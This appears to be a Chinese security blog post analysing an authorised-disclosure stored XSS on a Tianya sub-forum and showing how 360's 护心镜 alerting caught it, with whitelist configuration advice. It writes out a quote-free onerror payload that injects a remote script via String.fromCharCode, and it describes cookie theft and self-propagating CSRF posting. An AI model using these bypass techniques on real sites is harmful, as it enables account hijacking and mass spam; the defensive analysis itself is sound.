http://p3.qhimg.com/t01d6a740934b9ad98f.jpg

爱梅小礼@0Kee Team

漏洞分析

这个XSS存在于天涯某个不起眼的子论坛,通过发布新帖子可以触发。

论坛针对XSS有一定过滤措施,例如转义单双引号,过滤左右尖括号等等。所以一般的XSS盲注是没有作用的。

突破点在于发帖时会有一个上传网络图片的功能。

http://p7.qhimg.com/t011a321f8c20e8a390.png

上传后,图片会显示在帖子正文,即图片的URL会直接出现在IMG是SRC中。由于论坛过滤了尖括号,所以并不能突破IMG标签的限制,所以只能在标签内做一些动作了。如果论坛对双引号检查不严格的话,可以用以下思路突破src的双引号包裹,使用onerror/onload等事件来执行任意js代码。

http://p6.qhimg.com/t013859ee86659b89b3.png

如上图所示,前端做了验证,没有关系,通过Burpsuite来修改请求。

http://p8.qhimg.com/t019cd80371a8d86fdc.png

发现虽然代码成功插入,但是JS执行失败,因为第一个双引号被斜杠转义了,图片加载失败,所以onload事件没有触发,改用onerror即可,如下图所示:

http://p9.qhimg.com/t0103f0b0995219d250.png

如果我们要真正的去做些事情,光弹个框框是不够的,需要引入一个远程js文件。于是payload中的alert(1)得替换成




  s=document.createElement(“script”);s.src=”http://t.cn/?xxx”;//为了缩短payload长度,js的 URL使用了微博短网址进行了压缩。document.body.appendChild(s) 

这样就可以动态创建script标签引入外部js了。可是直接这样写会失败的,别忘了论坛转义了单双引号,所以将上面代码稍作变化




  s=document.createElement(document.head.children[1].tagName);//document.head.children[1]页面中固有的script标签。避免使用引号s.src=String.fromCharCode(104)+String.fromCharCode(116)     ... ...;//网址使用ascii的形式转化。避免使用引号。document.body.appendChild(s)

查看下Cookie,几乎可以登录所有分站。

http://p0.qhimg.com/t012803377db09113e6.png

所以偷Cookie可能是黑客们最擅长的了,国内的各种XSS平台都有现成的接口。

另外还可以做些什么呢,我们可以构造请求去各个板块发帖,看到帖子的用户点击进入了XSS页面,又会在不知情的情况下用自己的账户转发评论去诱骗更多的用户,受害者会以指数型增长,黑客收获的Cookie数量也会以指数增长。

通过构造以下XSS代码,就可以让中招用户在指定板块发帖,或者回复某人。如果是大V中招发帖,传播量肯定惊人。

http://p9.qhimg.com/t01853f2dc593bc9339.png

http://p0.qhimg.com/t01e627b6c98718a962.png

也可以让对方自动加你为好友,这样你以后发任何状态对方都可以看到,不经意间你就变成“大V”了:

http://p2.qhimg.com/t016cbb92c1cb8417bf.png

当然也让对方在自己的微博中发表一些状态、评论,传播作用非常棒。

http://p1.qhimg.com/t012c6c46b9f2452644.gif

http://p8.qhimg.com/t0114b54550cb8cd00b.png

以上这一切,都是静默操作的,中招用户并不知情。

当黑客控制了如此多的用户账户以及他们的Cookie,就可以做些能够变现的事情了。例如可以批量发送广告、SEO、贩卖用户个人资料,甚至是DDoS等等。

漏洞捕获

类似上面的案例在360护心镜告警平台中捕获了很多,通过分析告警内容,站长们几乎都在第一时间得知并修复了漏洞。

http://p6.qhimg.com/t0166c2c63411819519.png

上图即为本次事件的告警内容,从中可以解读出很多信息。从告警类型可以看出是由于网页调用了来自第三方的不明脚本。event_stack依据事件顺序记录了网页的行为。引发告警的位置就在于“创建SCRIPT标签|设置Script标签的SRC属性为:http://t.cn/XXXX”,访问http://t.cn/XXXX,内容如下:

http://p1.qhimg.com/t0130bcfbb0a48b65da.png

正如上面分析的一样,黑客偷取并维持了受害用户的Cookie,然后调用了一个评论接口,通过CSRF的方式在用户不知情的情况下自动发表了一些评论,宣传了一个网址。

截至漏洞修复,该XSS页面已有百余次访问量,但是通过Google搜索,发现没有一个用户因此中招,因为站长在配置护心镜的时候使用了默认阻断的模式,恶意js并没有执行,因此本次安全事件中没有造成实质性危害。

http://p8.qhimg.com/t01720b3ce46b0f7d2f.png

360护心镜目前有6个插件,分别对抗6种不同的XSS攻击,在本次事件中立功的是“第三方资源探测”插件。

http://p3.qhimg.com/t012d5cb2f401819e06.png

说起这个插件真是让人喜忧参半,因为它的“误报”比较高,分析原因有两方面:

1.浏览器广告插件与运营商篡改流量

在写这个插件之前,我只想安安静静的防止XSS乱入,但没有意识到国内前端环境如此复杂。当告警显示页面中有未经允许的远程js插入,而原始页面中并没有找到该js代码。分析js文件,往往发现是赤裸裸的广告。究其原因,应该是用户系统中安装的程序向浏览器中植入了广告插件。你可以在地址栏中输入

chrome://plugins/

检查下这些插件是不是你正常安装的。

还有就是部分地区的运营商为了增加收入,直接劫持流量,在网页中植入了广告代码导致了护心镜的“误判”。

所以,想知道有哪些没节操的运营商和插件在劫持流量,也不妨可以尝试护心镜的这个功能。

2.错误的白名单配置

配置护心镜就像谈恋爱一样,你需要把一个放纵不羁爱自由的姑娘调教成贤妻良母。

白名单是护心镜判断XSS的重要依据,如果配置不好则会有大量误报,如果处理方式再配置成阻断模式,则会影响页面正常功能。

http://p8.qhimg.com/t01eca9a5e1dce0acc8.png

需要配置成白名单的域名通常归类为:

Js、CSS、图片等静态媒体文件的域名。

iframe资源的域名。

广告功能所用域名

统计功能所用域名

Web在线聊天功能所用域名

微博等推广功能所用域名

在刚刚引入护心镜时候,建议将“危险处理方式”设置为“放行”,

http://p7.qhimg.com/t018f029bfb1c589bc6.png

这样即便是配置错误,也不会影响页面的正常运行。同时注意告警,如果发现误报,将引起误报的第三方域名加入白名单即可。这样经过短期“调教”后,则可以设置为阻断模式。

注:文章相关内容为天涯工作人员授权公开。